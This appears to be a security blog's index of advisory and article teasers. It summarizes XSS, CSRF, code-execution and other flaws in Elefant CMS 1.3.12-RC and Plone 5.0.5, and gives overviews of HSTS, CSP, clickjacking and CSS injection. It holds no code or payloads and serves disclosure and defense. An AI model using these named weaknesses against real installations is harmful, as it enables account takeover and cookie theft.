Elefant is a content managment system written in PHP. In version 1.3.12-RC, it is vulnerable to multiple persistent as well as a reflected XSS issue. To exploit these vulnerabilities a user account is required most of the time but registration is open by default. XSS allows an attacker to steal cookies, inject JavaScript keyloggers, or bypass CSRF protection.
Elefant is a content managment system written in PHP. In version 1.3.12-RC, it is vulnerable to various low to medium impact issues, namely open redirect, host header injection, and the leakage of password hashes. Open redirect and host header injection can be used for phishing attacks. The leakage of password hashes is restricted to users with an admin account.
Elefant is a content managment system written in PHP. In version 1.3.12-RC, it is vulnerable to cross site request forgery. If a victim visits a website that contains specifically crafted code while logged into Elefant, an attacker can for example create a new admin account without the victims knowledge.
Elefant is a content managment system written in PHP. In version 1.3.12-RC, it is vulnerable to code execution because of two different vulnerabilities. It allows the upload of files with dangerous type, as well as PHP code injection. To exploit this a editor or admin account is required.
This article will give a general overview over HTTP Strict Transport Security (HSTS) and discuss what attacks it tries to prevent, as well as how to use it correctly.
Plone is an open source CMS written in python. In version 5.0.5, the Zope Management Interface (ZMI) component is vulnerable to reflected XSS as it does not properly encode double quotes.
Written by Marco Lux, Mathis Hagen
This is the first of three articles about a cute sniffing device which can be used for redteam assessments but normal day analysis as well. In this part we will focus of setting up the basics.
Content Security Policy (CSP) is a HTTP header that can be used as defense in depth to mitigate certain types of attacks, especially Cross-site scripting (XSS) and Clickjacking. This article will explain when and how to use CSP.
Written by Tim Coen
It is often assumed that allowing a site to be framed only has minor security implications. Clickjacking in particular is often associated with low-impact issues such as stealing Facebook likes. This article will show that allowing a site to be framed may be a more potent attack vector than often assumed. Framing makes some vulnerabilities easier or more realistic to exploit. Clickjacking can be used for more than just stealing likes, and in some contexts Clickjacking can gain the full power of CSRF - albeit with more user interaction.
Because modern browsers do not allow the execution of JavaScript via CSS, CSS Injection is often seen as very limited, with the main dangers being defacement by placing images into the vulnerable application, or performing very limited phishing attacks by placing additional content in places a user would not expect user-controlled data to show. This article will show that it is possible to use CSS Injections to read out secret data in a vulnerable web application, independent of the browser used by the victim. With a successful attack, it would for example be possible to read out an anti-CSRF token and thus to perform CSRF attacks.
